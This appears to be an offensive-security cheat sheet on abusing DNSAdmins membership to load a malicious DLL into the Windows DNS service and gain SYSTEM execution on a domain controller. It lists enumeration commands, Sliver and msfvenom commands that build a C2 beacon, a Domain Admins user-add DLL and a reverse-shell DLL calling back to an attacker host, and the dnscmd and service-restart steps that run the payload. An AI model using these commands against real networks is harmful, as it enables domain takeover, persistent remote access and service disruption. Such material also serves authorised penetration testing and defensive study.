👾 Overview
Members of the DNSAdmins group are able to modify the DNS service, causing it to load an arbitrary DLL. This DLL runs as SYSTEM, allowing for SYSTEM level code execution on the DNS server, which is usually a DC.
🔍 Discovery
This requires a user in the DNSAdmins group.
# Check your user's groups
whoami /groups
# Use PowerView to find DNSAdmins
Get-NetGroupMember -Identity "DNSAdmins"
# Use PowerShell to find DNSAdmins
Get-ADGroupMember -Identity "DnsAdmins"📌 Exploitation
First, generate a malicious DLL for the DNS server to execute:
# Using Sliver C2 to generate a DLL
generate --http [IP]:[PORT] --format shared --os windows --skip-symbols
# Using MSFVenom to generate a DLL to add user to DA
msfvenom -p windows/x64/exec cmd='net group "domain admins" [USERNAME] /add /domain' -f dll -o adduser.dll
# Using MSFVenom to generate a reverse shell DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f dll > revshell.dllNext on the DNS server, use dnscmd.exe to register and run the DLL:
This will disrupt the DNS service
# Register DLL
dnscmd.exe [HOSTNAME] /config /serverlevelplugindll [DLL PATH]
# Restart DNS Service (executes payload)
sc.exe stop dns
sc.exe start dns